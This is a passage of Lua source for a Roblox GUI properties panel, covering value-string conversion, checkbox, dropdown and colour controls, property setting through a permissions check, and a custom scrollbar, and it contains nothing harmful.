#selection == 0 then return nil else return selection end end -- Number local function Round(number, decimalPlaces) return tonumber(string.format("%." .. (decimalPlaces or 0) .. "f", number)) end -- Strings local function Split(str, delimiter) local start = 1 local t = {} while true do local pos = string.find (str, delimiter, start, true) if not pos then break end table.insert (t, string.sub (str, start, pos - 1)) start = pos + string.len (delimiter) end table.insert (t, string.sub (str, start)) return t end -- Data Type Handling local function ToString(value, type) if type == "float" then return tostring(Round(value,2)) elseif type == "Content" then if string.find(value,"/asset") then local match = string.find(value, "=") + 1 local id = string.sub(value, match) return id else return tostring(value) end elseif type == "Vector2" then local x = value.x local y = value.y return string.format("%g, %g", x,y) elseif type == "Vector3" then local x = value.x local y = value.y local z = value.z return string.format("%g, %g, %g", x,y,z) elseif type == "Color3" then local r = value.r local g = value.g local b = value.b return string.format("%d, %d, %d", r*255,g*255,b*255) elseif type == "UDim2" then local xScale = value.X.Scale local xOffset = value.X.Offset local yScale = value.Y.Scale local yOffset = value.Y.Offset return string.format("{%d, %d}, {%d, %d}", xScale, xOffset, yScale, yOffset) else return tostring(value) end end local function ToValue(value,type) if type == "Vector2" then local list = Split(value,",") if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return Vector2.new(x,y) elseif type == "Vector3" then local list = Split(value,",") if #list < 3 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 local z = tonumber(list[3]) or 0 return Vector3.new(x,y,z) elseif type == "Color3" then local list = Split(value,",") if #list < 3 then return nil end local r = tonumber(list[1]) or 0 local g = tonumber(list[2]) or 0 local b = tonumber(list[3]) or 0 return Color3.new(r/255,g/255, b/255) elseif type == "UDim2" then local list = Split(string.gsub(string.gsub(value, "{", ""),"}",""),",") if #list < 4 then return nil end local xScale = tonumber(list[1]) or 0 local xOffset = tonumber(list[2]) or 0 local yScale = tonumber(list[3]) or 0 local yOffset = tonumber(list[4]) or 0 return UDim2.new(xScale, xOffset, yScale, yOffset) elseif type == "Content" then if tonumber(value) ~= nil then value = ContentUrl .. value end return value elseif type == "float" or type == "int" or type == "double" then return tonumber(value) elseif type == "string" then return value elseif type == "NumberRange" then local list = Split(value,",") if #list == 1 then if tonumber(list[1]) == nil then return nil end local newVal = tonumber(list[1]) or 0 return NumberRange.new(newVal) end if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return NumberRange.new(x,y) else return nil end end -- Tables local function CopyTable(T) local t2 = {} for k,v in pairs(T) do t2[k] = v end return t2 end local function SortTable(T) table.sort(T, function(x,y) return x.Name < y.Name end) end -- Spritesheet local Sprite = { Width = 13; Height = 13; } local Spritesheet = { Image = "http://www.roblox.com/asset/?id=128896947"; Height = 256; Width = 256; } local Images = { "unchecked", "checked", "unchecked_over", "checked_over", "unchecked_disabled", "checked_disabled" } local function SpritePosition(spriteName) local x = 0 local y = 0 for i,v in pairs(Images) do if (v == spriteName) then return {x, y} end x = x + Sprite.Height if (x + Sprite.Width) > Spritesheet.Width then x = 0 y = y + Sprite.Height end end end local function GetCheckboxImageName(checked, readOnly, mouseover) if checked then if readOnly then return "checked_disabled" elseif mouseover then return "checked_over" else return "checked" end else if readOnly then return "unchecked_disabled" elseif mouseover then return "unchecked_over" else return "unchecked" end end end local MAP_ID = 418720155 -- Gui Controls -- ---- IconMap ---- -- Image size: 256px x 256px -- Icon size: 16px x 16px -- Padding between each icon: 2px -- Padding around image edge: 1px -- Total icons: 14 x 14 (196) local Icon do local iconMap = 'http://www.roblox.com/asset/?id=' .. MAP_ID game:GetService('ContentProvider'):Preload(iconMap) local iconDehash do -- 14 x 14, 0-based input, 0-based output local f=math.floor function iconDehash(h) return f(h/14%14),f(h%14) end end function Icon(IconFrame,index) local row,col = iconDehash(index) local mapSize = Vector2.new(256,256) local pad,border = 2,1 local iconSize = 16 local class = 'Frame' if type(IconFrame) == 'string' then class = IconFrame IconFrame = nil end if not IconFrame then IconFrame = Create(class,{ Name = "Icon"; BackgroundTransparency = 1; ClipsDescendants = true; Create('ImageLabel',{ Name = "IconMap"; Active = false; BackgroundTransparency = 1; Image = iconMap; Size = UDim2.new(mapSize.x/iconSize,0,mapSize.y/iconSize,0); }); }) end IconFrame.IconMap.Position = UDim2.new(-col - (pad*(col+1) + border)/iconSize,0,-row - (pad*(row+1) + border)/iconSize,0) return IconFrame end end local function CreateCell() local tableCell = Instance.new("Frame") tableCell.Size = UDim2.new(0.5, -1, 1, 0) tableCell.BackgroundColor3 = Row.BackgroundColor tableCell.BorderColor3 = Row.BorderColor return tableCell end local function CreateLabel(readOnly) local label = Instance.new("TextLabel") label.Font = Row.Font label.FontSize = Row.FontSize label.TextXAlignment = Row.TextXAlignment label.BackgroundTransparency = 1 if readOnly then label.TextColor3 = Row.TextLockedColor else label.TextColor3 = Row.TextColor end return label end local function CreateTextButton(readOnly, onClick) local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 if readOnly then button.TextColor3 = Row.TextLockedColor else button.TextColor3 = Row.TextColor button.MouseButton1Click:connect(function() onClick() end) end return button end local function CreateObject(readOnly) local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 if readOnly then button.TextColor3 = Row.TextLockedColor else button.TextColor3 = Row.TextColor end local cancel = Create(Icon('ImageButton',177),{ Name = "Cancel"; Visible = false; Position = UDim2.new(1,-20,0,0); Size = UDim2.new(0,20,0,20); Parent = button; }) return button end local function CreateTextBox(readOnly) if readOnly then local box = CreateLabel(readOnly) return box else local box = Instance.new("TextBox") if not SettingsRemote:Invoke("ClearProps") then box.ClearTextOnFocus = false end box.Font = Row.Font box.FontSize = Row.FontSize box.TextXAlignment = Row.TextXAlignment box.BackgroundTransparency = 1 box.TextColor3 = Row.TextColor return box end end local function CreateDropDownItem(text, onClick) local button = Instance.new("TextButton") button.Font = DropDown.Font button.FontSize = DropDown.FontSize button.TextColor3 = DropDown.TextColor button.TextXAlignment = DropDown.TextXAlignment button.BackgroundColor3 = DropDown.BackColor button.AutoButtonColor = false button.BorderSizePixel = 0 button.Active = true button.Text = text button.MouseEnter:connect(function() button.TextColor3 = DropDown.TextColorOver button.BackgroundColor3 = DropDown.BackColorOver end) button.MouseLeave:connect(function() button.TextColor3 = DropDown.TextColor button.BackgroundColor3 = DropDown.BackColor end) button.MouseButton1Click:connect(function() onClick(text) end) return button end local function CreateDropDown(choices, currentChoice, readOnly, onClick) local frame = Instance.new("Frame") frame.Name = "DropDown" frame.Size = UDim2.new(1, 0, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 button.TextColor3 = Row.TextColor if readOnly then button.TextColor3 = Row.TextLockedColor end button.Text = currentChoice button.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) button.Position = UDim2.new(0, Styles.Margin, 0, 0) button.Parent = frame local function showArrow(color) if arrow then arrow:Destroy() end local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = color; }) local graphicSize = 16/2 arrow = ArrowGraphic(graphicSize,'Down',true,graphicTemplate) arrow.Position = UDim2.new(1,-graphicSize * 2,0.5,-graphicSize/2) arrow.Parent = frame end local function hideMenu() expanded = false showArrow(DropDown.ArrowColor) if menu then menu:Destroy() end end local function showMenu() expanded = true menu = Instance.new("Frame") menu.Size = UDim2.new(1, -2 * margin, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, Row.Height + margin) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.Active = true menu.ZIndex = 5 menu.Parent = frame local parentFrameHeight = menu.Parent.Parent.Parent.Parent.Size.Y.Offset local rowHeight = menu.Parent.Parent.Parent.Position.Y.Offset if (rowHeight + menu.Size.Y.Offset) > math.max(parentFrameHeight,PropertiesFrame.AbsoluteSize.y) then menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateDropDownItem(name, function() choice(name) end) option.Size = UDim2.new(1, 0, 0, 16) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showArrow(DropDown.ArrowColor) if not readOnly then button.MouseEnter:connect(function() button.TextColor3 = Row.TextColor showArrow(DropDown.ArrowColorOver) end) button.MouseLeave:connect(function() button.TextColor3 = Row.TextColor if not expanded then showArrow(DropDown.ArrowColor) end end) button.MouseButton1Click:connect(function() if expanded then hideMenu() else showMenu() end end) end return frame,button end local function CreateBrickColor(readOnly, onClick) local frame = Instance.new("Frame") frame.Size = UDim2.new(1,0,1,0) frame.BackgroundTransparency = 1 local colorPalette = Instance.new("Frame") colorPalette.BackgroundTransparency = 0 colorPalette.SizeConstraint = Enum.SizeConstraint.RelativeXX colorPalette.Size = UDim2.new(1, -2 * BrickColors.OuterBorder, 1, -2 * BrickColors.OuterBorder) colorPalette.BorderSizePixel = BrickColors.BorderSizePixel colorPalette.BorderColor3 = BrickColors.BorderColor colorPalette.Position = UDim2.new(0, BrickColors.OuterBorder, 0, BrickColors.OuterBorder + Row.Height) colorPalette.ZIndex = 5 colorPalette.Visible = false colorPalette.BorderSizePixel = BrickColors.OuterBorder colorPalette.BorderColor3 = BrickColors.OuterBorderColor colorPalette.Parent = frame local function show() colorPalette.Visible = true end local function hide() colorPalette.Visible = false end local function toggle() colorPalette.Visible = not colorPalette.Visible end local colorBox = Instance.new("TextButton", frame) colorBox.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) colorBox.Size = UDim2.new(0, BrickColors.BoxSize, 0, BrickColors.BoxSize) colorBox.Text = "" colorBox.MouseButton1Click:connect(function() if not readOnly then toggle() end end) if readOnly then colorBox.AutoButtonColor = false end local spacingBefore = (Styles.Margin * 2) + BrickColors.BoxSize local propertyLabel = CreateTextButton(readOnly, function() if not readOnly then toggle() end end) propertyLabel.Size = UDim2.new(1, (-1 * spacingBefore) - Styles.Margin, 1, 0) propertyLabel.Position = UDim2.new(0, spacingBefore, 0, 0) propertyLabel.Parent = frame local size = (1 / BrickColors.ColorsPerRow) for index = 0, 127 do local brickColor = BrickColor.palette(index) local color3 = brickColor.Color local x = size * (index % BrickColors.ColorsPerRow) local y = size * math.floor(index / BrickColors.ColorsPerRow) local brickColorBox = Instance.new("TextButton") brickColorBox.Text = "" brickColorBox.Size = UDim2.new(size,0,size,0) brickColorBox.BackgroundColor3 = color3 brickColorBox.Position = UDim2.new(x, 0, y, 0) brickColorBox.ZIndex = colorPalette.ZIndex brickColorBox.Parent = colorPalette brickColorBox.MouseButton1Click:connect(function() hide() onClick(brickColor) end) end return frame,propertyLabel,colorBox end local function CreateColor3Control(readOnly, onClick) local frame = Instance.new("Frame") frame.Size = UDim2.new(1,0,1,0) frame.BackgroundTransparency = 1 local colorBox = Instance.new("TextButton", frame) colorBox.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) colorBox.Size = UDim2.new(0, BrickColors.BoxSize, 0, BrickColors.BoxSize) colorBox.Text = "" colorBox.AutoButtonColor = false local spacingBefore = (Styles.Margin * 2) + BrickColors.BoxSize local box = CreateTextBox(readOnly) box.Size = UDim2.new(1, (-1 * spacingBefore) - Styles.Margin, 1, 0) box.Position = UDim2.new(0, spacingBefore, 0, 0) box.Parent = frame return frame,box,colorBox end function CreateCheckbox(value, readOnly, onClick) local checked = value local mouseover = false local checkboxFrame = Instance.new("ImageButton") checkboxFrame.Size = UDim2.new(0, Sprite.Width, 0, Sprite.Height) checkboxFrame.BackgroundTransparency = 1 checkboxFrame.ClipsDescendants = true --checkboxFrame.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) local spritesheetImage = Instance.new("ImageLabel", checkboxFrame) spritesheetImage.Name = "SpritesheetImageLabel" spritesheetImage.Size = UDim2.new(0, Spritesheet.Width, 0, Spritesheet.Height) spritesheetImage.Image = Spritesheet.Image spritesheetImage.BackgroundTransparency = 1 local function updateSprite() local spriteName = GetCheckboxImageName(checked, readOnly, mouseover) local spritePosition = SpritePosition(spriteName) spritesheetImage.Position = UDim2.new(0, -1 * spritePosition[1], 0, -1 * spritePosition[2]) end local function setValue(val) checked = val updateSprite() end if not readOnly then checkboxFrame.MouseEnter:connect(function() mouseover = true updateSprite() end) checkboxFrame.MouseLeave:connect(function() mouseover = false updateSprite() end) checkboxFrame.MouseButton1Click:connect(function() onClick(checked) end) end updateSprite() return checkboxFrame, setValue end -- Code for handling controls of various data types -- local Controls = {} Controls["default"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local box = CreateTextBox(readOnly) box.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) box.Position = UDim2.new(0, Styles.Margin, 0, 0) local function update() local value = object[propertyName] box.Text = ToString(value, propertyType) end if not readOnly then box.FocusLost:connect(function(enterPressed) Set(object, propertyData, ToValue(box.Text,propertyType)) update() end) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return box end Controls["bool"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local checked = object[propertyName] local checkbox, setValue = CreateCheckbox(checked, readOnly, function(value) Set(object, propertyData, not checked) end) checkbox.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) setValue(checked) local function update() checked = object[propertyName] setValue(checked) end object.Changed:connect(function(property) if (property == propertyName) then update() end end) if object:IsA("BoolValue") then object.Changed:connect(function(val) update() end) end update() return checkbox end Controls["BrickColor"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local frame,label,brickColorBox = CreateBrickColor(readOnly, function(brickColor) Set(object, propertyData, brickColor) end) local function update() local value = object[propertyName] brickColorBox.BackgroundColor3 = value.Color label.Text = tostring(value) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return frame end Controls["Color3"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local frame,textBox,colorBox = CreateColor3Control(readOnly) textBox.FocusLost:connect(function(enterPressed) Set(object, propertyData, ToValue(textBox.Text,"Color3")) local value = object[propertyName] colorBox.BackgroundColor3 = value textBox.Text = ToString(value, "Color3") end) local function update() local value = object[propertyName] colorBox.BackgroundColor3 = value textBox.Text = ToString(value, "Color3") end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return frame end Controls["Enum"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local enumName = object[propertyName].Name local enumNames = {} for _,enum in pairs(Enum[tostring(propertyType)]:GetEnumItems()) do table.insert(enumNames, enum.Name) end local dropdown, propertyLabel = CreateDropDown(enumNames, enumName, readOnly, function(value) Set(object, propertyData, value) end) --dropdown.Parent = frame local function update() local value = object[propertyName].Name propertyLabel.Text = tostring(value) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return dropdown end Controls["Object"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local box = CreateObject(readOnly,function()end) box.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) box.Position = UDim2.new(0, Styles.Margin, 0, 0) local function update() if AwaitingObjectObj == object then if AwaitingObjectValue == true then box.Text = "Select an Object" return end end local value = object[propertyName] box.Text = ToString(value, propertyType) end if not readOnly then box.MouseButton1Click:connect(function() if AwaitingObjectValue then AwaitingObjectValue = false update() return end AwaitingObjectValue = true AwaitingObjectObj = object AwaitingObjectProp = propertyData box.Text = "Select an Object" end) box.Cancel.Visible = true box.Cancel.MouseButton1Click:connect(function() object[propertyName] = nil end) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) if object:IsA("ObjectValue") then object.Changed:connect(function(val) update() end) end return box end function GetControl(object, propertyData, readOnly) local propertyType = propertyData["ValueType"] local control = nil if Controls[propertyType] then control = Controls[propertyType](object, propertyData, readOnly) elseif RbxApi.IsEnum(propertyType) then control = Controls["Enum"](object, propertyData, readOnly) else control = Controls["default"](object, propertyData, readOnly) end return control end -- Permissions function CanEditObject(object) local player = Players.LocalPlayer local character = player.Character return Permissions.CanEdit end function CanEditProperty(object,propertyData) local tags = propertyData["tags"] for _,name in pairs(tags) do if name == "readonly" then return false end end return CanEditObject(object) end --RbxApi local function PropertyIsHidden(propertyData) local tags = propertyData["tags"] for _,name in pairs(tags) do if name == "deprecated" or name == "hidden" or name == "writeonly" then return true end end return false end function Set(object, propertyData, value) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] if value == nil then return end for i,v in pairs(GetSelection()) do if CanEditProperty(v,propertyData) then pcall(function() --print("Setting " .. propertyName .. " to " .. tostring(value)) v[propertyName] = value end) end end end function CreateRow(object, propertyData, isAlternateRow) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local propertyValue = object[propertyName] --rowValue, rowValueType, isAlternate local backColor = Row.BackgroundColor; if (isAlternateRow) then backColor = Row.BackgroundColorAlternate end local readOnly = not CanEditProperty(object, propertyData) if propertyType == "Instance" or propertyName == "Parent" then readOnly = true end local rowFrame = Instance.new("Frame") rowFrame.Size = UDim2.new(1,0,0,Row.Height) rowFrame.BackgroundTransparency = 1 rowFrame.Name = 'Row' local propertyLabelFrame = CreateCell() propertyLabelFrame.Parent = rowFrame propertyLabelFrame.ClipsDescendants = true local propertyLabel = CreateLabel(readOnly) propertyLabel.Text = propertyName propertyLabel.Size = UDim2.new(1, -1 * Row.TitleMarginLeft, 1, 0) propertyLabel.Position = UDim2.new(0, Row.TitleMarginLeft, 0, 0) propertyLabel.Parent = propertyLabelFrame local propertyValueFrame = CreateCell() propertyValueFrame.Size = UDim2.new(0.5, -1, 1, 0) propertyValueFrame.Position = UDim2.new(0.5, 0, 0, 0) propertyValueFrame.Parent = rowFrame local control = GetControl(object, propertyData, readOnly) control.Parent = propertyValueFrame rowFrame.MouseEnter:connect(function() propertyLabelFrame.BackgroundColor3 = Row.BackgroundColorMouseover propertyValueFrame.BackgroundColor3 = Row.BackgroundColorMouseover end) rowFrame.MouseLeave:connect(function() propertyLabelFrame.BackgroundColor3 = backColor propertyValueFrame.BackgroundColor3 = backColor end) propertyLabelFrame.BackgroundColor3 = backColor propertyValueFrame.BackgroundColor3 = backColor return rowFrame end function ClearPropertiesList() for _,instance in pairs(ContentFrame:GetChildren()) do instance:Destroy() end end local selection = Gui:FindFirstChild("Selection", 1) print(selection) function displayProperties(props) for i,v in pairs(props) do pcall(function() local a = CreateRow(v.object, v.propertyData, ((numRows % 2) == 0)) a.Position = UDim2.new(0,0,0,numRows*Row.Height) a.Parent = ContentFrame numRows = numRows + 1 end) end end function checkForDupe(prop,props) for i,v in pairs(props) do if v.propertyData.Name == prop.Name and v.propertyData.ValueType == prop.ValueType then return true end end return false end function sortProps(t) table.sort(t, function(x,y) return x.propertyData.Name < y.propertyData.Name end) end function showProperties(obj) ClearPropertiesList() if obj == nil then return end local propHolder = {} local foundProps = {} numRows = 0 for _,nextObj in pairs(obj) do if not foundProps[nextObj.className] then foundProps[nextObj.className] = true for i,v in pairs(RbxApi.GetProperties(nextObj.className)) do local suc, err = pcall(function() if not (PropertyIsHidden(v)) and not checkForDupe(v,propHolder) then if string.find(string.lower(v.Name),string.lower(propertiesSearch.Text)) or not searchingProperties() then table.insert(propHolder,{propertyData = v, object = nextObj}) end end end) --[[if not suc then warn("Problem getting the value of property " .. v.Name .. " | " .. err) end --]] end end end sortProps(propHolder) displayProperties(propHolder) ContentFrame.Size = UDim2.new(1, 0, 0, numRows * Row.Height) scrollBar.ScrollIndex = 0 scrollBar.TotalSpace = numRows * Row.Height scrollBar.Update() end ---------------------------------------------------------------- -----------------------SCROLLBAR STUFF-------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- local ScrollBarWidth = 16 local ScrollStyles = { Background = Color3.new(233/255, 233/255, 233/255); Border = Color3.new(149/255, 149/255, 149/255); Selected = Color3.new( 63/255, 119/255, 189/255); BorderSelected = Color3.new( 55/255, 106/255, 167/255); Text = Color3.new( 0/255, 0/255, 0/255); TextDisabled = Color3.new(128/255, 128/255, 128/255); TextSelected = Color3.new(255/255, 255/255, 255/255); Button = Color3.new(221/255, 221/255, 221/255); ButtonBorder = Color3.new(149/255, 149/255, 149/255); ButtonSelected = Color3.new(255/255, 0/255, 0/255); Field = Color3.new(255/255, 255/255, 255/255); FieldBorder = Color3.new(191/255, 191/255, 191/255); TitleBackground = Color3.new(178/255, 178/255, 178/255); } do local ZIndexLock = {} function SetZIndex(object,z) if not ZIndexLock[object] then ZIndexLock[object] = true if object:IsA'GuiObject' then object.ZIndex = z end local children = object:GetChildren() for i = 1,#children do SetZIndex(children[i],z) end ZIndexLock[object] = nil end end end function SetZIndexOnChanged(object) return object.Changed:connect(function(p) if p == "ZIndex" then SetZIndex(object,object.ZIndex) end end) end function Create(ty,data) local obj if type(ty) == 'string' then obj = Instance.new(ty) else obj = ty end for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end -- returns the ascendant ScreenGui of an object function GetScreen(screen) if screen == nil then return nil end while not screen:IsA("ScreenGui") do screen = screen.Parent if screen == nil then return nil end end return screen end -- AutoButtonColor doesn't always reset properly function ResetButtonColor(button) local active = button.Active button.Active = not active button.Active = active end function ArrowGraphic(size,dir,scaled,template) local Frame = Create('Frame',{ Name = "Arrow Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size,0,size); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end local transform if dir == nil or dir == 'Up' then function transform(p,s) return p,s end elseif dir == 'Down' then function transform(p,s) return UDim2.new(0,p.X.Offset,0,size-p.Y.Offset-1),s end elseif dir == 'Left' then function transform(p,s) return UDim2.new(0,p.Y.Offset,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end elseif dir == 'Right' then function transform(p,s) return UDim2.new(0,size-p.Y.Offset-1,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end end local scale if scaled then function scale(p,s) return UDim2.new(p.X.Offset/size,0,p.Y.Offset/size,0),UDim2.new(s.X.Offset/size,0,s.Y.Offset/size,0) end else function scale(p,s) return p,s end end local o = math.floor(size/4) if size%2 == 0 then local n = size/2-1 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,(i+1)*2,0,1) )) t.Position = p t.Size = s t.Parent = Frame end else local n = (size-1)/2 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,i*2+1,0,1) )) t.Position = p t.Size = s t.Parent = Frame end end if size%4 > 1 then local t = template:Clone() local p,s = scale(transform( UDim2.new(0,0,0,size-o-1), UDim2.new(0,size,0,1) )) t.Position = p t.Size = s t.Parent = Frame end return Frame end function GripGraphic(size,dir,spacing,scaled,template) local Frame = Create('Frame',{ Name = "Grip Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size.x,0,size.y); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end spacing = spacing or 2 local scale if scaled then function scale(p) return UDim2.new(p.X.Offset/size.x,0,p.Y.Offset/size.y,0) end else function scale(p) return p end end if dir == 'Vertical' then for i=0,size.x-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,1,0,size.y)) t.Position = scale(UDim2.new(0,i,0,0)) t.Parent = Frame end elseif dir == nil or dir == 'Horizontal' then for i=0,size.y-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,size.x,0,1)) t.Position = scale(UDim2.new(0,0,0,i)) t.Parent = Frame end end return Frame end do local mt = { __index = { GetScrollPercent = function(self) return self.ScrollIndex/(self.TotalSpace-self.VisibleSpace) end; CanScrollDown = function(self) return self.ScrollIndex + self.VisibleSpace < self.TotalSpace end; CanScrollUp = function(self) return self.ScrollIndex > 0 end; ScrollDown = function(self) self.ScrollIndex = self.ScrollIndex + self.PageIncrement self:Update() end; ScrollUp = function(self) self.ScrollIndex = self.ScrollIndex - self.PageIncrement self:Update() end; ScrollTo = function(self,index) self.ScrollIndex = index self:Update() end; SetScrollPercent = function(self,percent) self.ScrollIndex = math.floor((self.TotalSpace - self.VisibleSpace)*percent + 0.5) self:Update() end; }; } mt.__index.CanScrollRight = mt.__index.CanScrollDown mt.__index.CanScrollLeft = mt.__index.CanScrollUp mt.__index.ScrollLeft = mt.__index.ScrollUp mt.__index.ScrollRight = mt.__index.ScrollDown function ScrollBar(horizontal) -- create row scroll bar local ScrollFrame = Create('Frame',{ Name = "ScrollFrame"; Position = horizontal and UDim2.new(0,0,1,-ScrollBarWidth) or UDim2.new(1,-ScrollBarWidth,0,0); Size = horizontal and UDim2.new(1,0,0,ScrollBarWidth) or UDim2.new(0,ScrollBarWidth,1,0); BackgroundTransparency = 1; Create('ImageButton',{ Name = "ScrollDown"; Position = horizontal and UDim2.new(1,-ScrollBarWidth,0,0) or UDim2.new(0,0,1,-ScrollBarWidth); Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollUp"; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollBar"; Size = horizontal and UDim2.new(1,-ScrollBarWidth*2,1,0) or UDim2.new(1,0,1,-ScrollBarWidth*2); Position = horizontal and UDim2.new(0,ScrollBarWidth,0,0) or UDim2.new(0,0,0,ScrollBarWidth); AutoButtonColor = false; BackgroundColor3 = Color3.new(0.94902, 0.94902, 0.94902); BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; Create('ImageButton',{ Name = "ScrollThumb"; AutoButtonColor = false; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); }); }) local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = ScrollStyles.Border; }) local graphicSize = ScrollBarWidth/2 local ScrollDownFrame = ScrollFrame.ScrollDown local ScrollDownGraphic = ArrowGraphic(graphicSize,horizontal and 'Right' or 'Down',true,graphicTemplate) ScrollDownGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollDownGraphic.Parent = ScrollDownFrame local ScrollUpFrame = ScrollFrame.ScrollUp local ScrollUpGraphic = ArrowGraphic(graphicSize,horizontal and 'Left' or 'Up',true,graphicTemplate) ScrollUpGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollUpGraphic.Parent = ScrollUpFrame local ScrollBarFrame = ScrollFrame.ScrollBar local ScrollThumbFrame = ScrollBarFrame.ScrollThumb do local size = ScrollBarWidth*3/8 local Decal = GripGraphic(Vector2.new(size,size),horizontal and 'Vertical' or 'Horizontal',2,graphicTemplate) Decal.Position = UDim2.new(0.5,-size/2,0.5,-size/2) Decal.Parent = ScrollThumbFrame end local MouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local Class = setmetatable({ GUI = ScrollFrame; ScrollIndex = 0; VisibleSpace = 0; TotalSpace = 0; PageIncrement = 1; },mt) local UpdateScrollThumb if horizontal then function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(Class.VisibleSpace/Class.TotalSpace,0,0,ScrollBarWidth) if ScrollThumbFrame.AbsoluteSize.x < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.x ScrollThumbFrame.Position = UDim2.new(Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.x)/barSize,0,0,0) end else function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,Class.VisibleSpace/Class.TotalSpace,0) if ScrollThumbFrame.AbsoluteSize.y < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.y ScrollThumbFrame.Position = UDim2.new(0,0,Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.y)/barSize,0) end end local lastDown local lastUp local scrollStyle = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0} local scrollStyle_ds = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0.7} local function Update() local t = Class.TotalSpace local v = Class.VisibleSpace local s = Class.ScrollIndex if v <= t then if s > 0 then if s + v > t then Class.ScrollIndex = t - v end else Class.ScrollIndex = 0 end else Class.ScrollIndex = 0 end if Class.UpdateCallback then if Class.UpdateCallback(Class) == false then return end end local down = Class:CanScrollDown() local up = Class:CanScrollUp() if down ~= lastDown then lastDown = down ScrollDownFrame.Active = down ScrollDownFrame.AutoButtonColor = down local children = ScrollDownGraphic:GetChildren() local style = down and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end if up ~= lastUp then lastUp = up ScrollUpFrame.Active = up ScrollUpFrame.AutoButtonColor = up local children = ScrollUpGraphic:GetChildren() local style = up and 